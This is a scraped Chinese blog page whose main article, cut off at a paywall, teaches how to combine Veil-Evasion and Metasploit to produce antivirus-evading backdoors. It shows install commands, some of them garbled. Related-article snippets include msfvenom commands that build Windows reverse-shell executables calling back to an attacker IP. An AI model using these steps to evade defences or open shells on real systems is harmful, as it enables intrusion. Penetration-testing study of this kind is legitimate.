免杀后门之MSF&Veil-Evasion的完美结合

最新推荐文章于 2024-08-15 09:37:02 发布
最新推荐文章于 2024-08-15 09:37:02 发布
阅读量1.3w 收藏 24
点赞数 1
分类专栏: 渗透测试 文章标签: 玄魂工作室 安全 免杀 metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuanhun521/article/details/52821247
版权
本文介绍了如何结合Veil-Evasion和Metasploit生成绕过杀毒软件的payload。首先在Kali Linux上安装Veil-Evasion,然后通过其菜单配置生成Python payload,并进行加密和编译。最终利用Metasploit的rc文件控制shellcode,实现目标系统的反弹shell。这是一个详细的免杀后门创建教程。
摘要由CSDN通过智能技术生成

本文由“即刻安全”投稿到“玄魂工作室”

Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的 payload !kali 上并未安装,下面我们来进行简单的安装。我们直接从 github 上进行 clone 下载:

git clone https://www.github.com/Veil-Framework/Veil-Evasion.git

图1

下载完成后,我们还需要对其软件配置包进行安装,依次输入如下命令:

复制代码 
lscd Veil-Evasion/lscd setup/ls./setup.
最低0.47元/天 解锁文章
玄魂
关注
专栏目录
Veil-Evasion免杀
afei001
04-08 512
Veil-Evasion简介 Veil-Evasion是与Metasploit生成相兼容的Payload的一款辅助框架,并可以绕过大多数的杀软。 Veil-Evasion并没有集成在kali,配置sources.list,可直接apt-get。 Github项目地址:https://github.com/Veil-Framework/Veil-Evas...
TideSec远控免杀学习二(Evasion模块+veil
fa1lr4in的小博客
02-10 1265
Evasion模块 参考链接: applocker_evasion_install_util.md: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/evasion/windows/applocker_evasion_install_util.md 基于白名单Csc.exe执行...
使用MSF生成的shellcode打造免杀payload
MickeyMouse1928的博客
05-04 1万+
环境: 1.Kali攻击机IP:192.168.114.140 2.使用win7生成exe 步骤: 使用msfvenom生成shellcode : msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c win7中使用Visual studio创建Win32控制台
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
最新发布
baimao__Ch的博客
08-15 1007
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。最后。
msfvenom的简单使用
jeff_true的博客
01-14 645
1,msfvenom -l | grep windows | grep x64 | grep tcp 2,msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.19.91.10 LPORT=4444 -f exe > shell.exe 将此exe文件传到目标靶机上(windows x64) 3,msfconsole use exploit/...
渗透测试(一)-Msf生成免杀后门(内网篇)
阿航的博客
05-25 2953
实验环境: 攻击机:kali linux-2021.1(192.168.56.128) 靶机:Windows10(192.168.1.120) 推荐两个免费在线木马检测网站:VirusScan和VirusTotal 原理图: 1. Meterpreter简介 Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道,使用它作为攻击载荷能够获得目标系统的一个Meterpre..
利用metasploit生成免杀后门
mirror97black的博客
01-26 5637
免杀 之前的博客中,有利用msf生成代码,目标机执行然后获得shell。但是现在有很多杀软,对各种木马有检测机制,执行危险代码或者运行危险程序,杀软会进行阻止。 免杀有很多种方式,今天介绍一种利用msf生成shellcode免杀,编译为exe文件,这种免杀能够绕过大部分杀软 静态免杀 静态免杀是能够绕过杀软检测,运行时也不会报毒。但是执行危险命令就会报毒,比如说新建用户、进程注入等。 使
网络对抗技术-Exp3-免杀原理 20181314
weixin_46014245的博客
03-31 711
一、免杀原理及基础问题回答 1.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。 2.基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测:简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出
20194301刘畅Exp3-免杀原理与实践
qq_54196192的博客
04-09 211
目录 一、实验概述 1.实验目的: 2.主要任务: 3.实验环境: 二、基础问题回答 1.杀软是如何检测出恶意代码的? 2.免杀是做什么? 3.免杀的基本方法有哪些? 4.开启杀软能绝对防止电脑中恶意代码吗? 三、实验过程 (〇)查看可使用的payload和编码器 1.payload 2.编码器 (一)正确使用MSF编码器,使用msfvenom生成如jar之类的其他文件 1.检测实验二生成的后门文件(53/69) 2.使用Unicode编码一次 (53/69) 3..
Android App 免杀教程
若彬的成长笔记
06-28 1万+
如何让你的app一直在运行状态呢? 默认情况下,不做任何跨进程部署配置的话,每个android app运行在单独一个虚拟机上,每个虚拟机对应一个进程。当app被系统回收或者是被用户主动杀掉(通过app管理软件),进程就彻底退出了。 在有些场景,app所在的进程退出了,我们希望还能做一些操作。比如,app被卸载后(卸载会先退出运行),我们希望跳转浏览器做一些卸载原
MSF(2)——各种木马的生成及简单的免杀
realmels的博客
06-11 4216
这里是各种木马的生成示例 在实际渗透过程中根据需求生成这里主要是php的免杀和Python的免杀,原理都是自定义加密及解密可参考前文 https://blog.csdn.net/realmels/article/details/119280877重点来了使用上文方法生成的木马,所有的木马都会报毒D盾扫描结果 火绒扫描结果 而对于exe的免杀比较复杂(主要我不会),所以在这里介绍一种简单的免杀方法。我们可以先生成一个Python的msf马,然后利用Python技术,对该木马进行免杀,最后将该木马打包成可
发现一个木马的新的捆绑方式
《Java程序员,上班那点事儿》——清华大学出版社
02-01 6730
大家注意!!近期发现某些非官方站点上下载的Tomcat安装包中有后门,进而成为黑客安装木马的工具,黑客可以很轻易的下载上传该服务器上的任何文件,再次提示:请务必从官方站点下载Tomcat!! 钟声 2012-2-1 @360运营专员 @金山毒霸微服务-赵言 我的微博:http://weibo.com/useway
MSF android apk动态分析
大脸猫的博客
10-29 2528
MSF动态分析配置过程见链接 https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/wiki/Documentation通过manger.py runserver启动本地服务,访问127.0.0.1:8000访问服务,上传APK静态分析 点击”start dynamic analysis”开始动态分析 分析前需下载如下模块
kali201703安装Veil Evasion
wo1769815的专栏
12-11 2673
使用代理安装的,有些包会下载安装失败,可以提前安装,记录下基本过程: apt-get install libncurses5* apt-get install libavutil55* apt-get install gcc-mingw-w64* apt-get install wine32 mkdir Desktop/tools cd Desktop/tools git c
揭开常见病毒免杀手法的面纱(浅论杀或者不杀.第二篇)
leolewin的博客
08-21 2327
你杀或者不杀我,我就在那里不悲不喜…… 借用黑客防线的名言:“在攻与防的对立统一中寻求突破!” 小甲鱼从现在开始就厚着脸皮跟大家来谈谈杀毒软件查杀病毒、木马的原理以及病毒、木马如何做出应对和反击的措施。 第二篇 揭开常见病毒免杀手法的面纱。 由前一篇我们知道,杀毒软件虽然技术日益更新,但主流的查杀方案还是通过特征码的方式来查杀病毒木马的:当一个新的病毒木马或可疑程序一旦出现
msfconsole 控制台使用和操作
热门推荐
xianjie0318的博客
08-07 2万+
Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值